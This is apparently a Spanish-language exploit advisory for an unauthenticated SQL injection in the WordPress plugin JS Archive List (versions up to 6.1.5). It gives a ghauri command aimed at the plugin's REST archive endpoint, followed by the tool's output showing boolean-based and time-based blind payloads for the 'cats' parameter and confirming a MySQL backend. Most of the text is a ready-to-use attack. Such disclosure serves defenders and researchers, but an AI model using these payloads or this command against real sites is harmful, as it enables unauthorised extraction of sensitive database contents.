
JS Archive List <= 6.1.5 - Inyección SQL no autenticada
JS Archive List <= 6.1.5 - Inyección SQL no autenticada
El plugin JS Archive List para WordPress es vulnerable a Inyección SQL en todas las versiones hasta la 6.1.5 inclusive, debido a un escape insuficiente en el parámetro proporcionado por el usuario y a la falta de preparación adecuada en la consulta SQL existente. Esto permite que atacantes no autenticados añadan consultas SQL adicionales a las consultas ya existentes, que pueden ser utilizadas para extraer información sensible de la base de datos.
ghauri -u "http://localhost/wp-json/jalw/v1/archive?cats=1&exclusionType=exclude"
________.__ .__ {1.4.1}
/ _____/| |__ _____ __ _________|__|
/ \ ___| | \\__ \ | | \_ __ \ |
\ \_\ \ Y \/ __ \| | /| | \/ |
\______ /___| (____ /____/ |__| |__|
\/ \/ \/ https://github.com/r0oth3x49
Herramienta avanzada de detección y explotación de inyección SQL.
[*] iniciando @ 16:39:05 /2025-09-25/
[16:39:05] [INFO] probando conexión a la URL objetivo
Ghauri reanudó el(los) siguiente(s) punto(s) de inyección de la sesión almacenada:
---
Parámetro: cats (GET)
Tipo: blind basado en booleanos
Título: AND blind basado en booleanos - cláusula WHERE o HAVING
Payload: cats=1 AND 01609=1609&exclusionType=exclude
Tipo: blind basado en tiempo
Título: MySQL >= 5.0.12 blind basado en tiempo (IF - comentario)
Payload: cats=if(now()=sysdate(),SLEEP(5),0)&exclusionType=exclude
---
[16:39:05] [INFO] probando MySQL
[16:39:05] [INFO] confirmando MySQL
[16:39:06] [INFO] el DBMS del backend es MySQL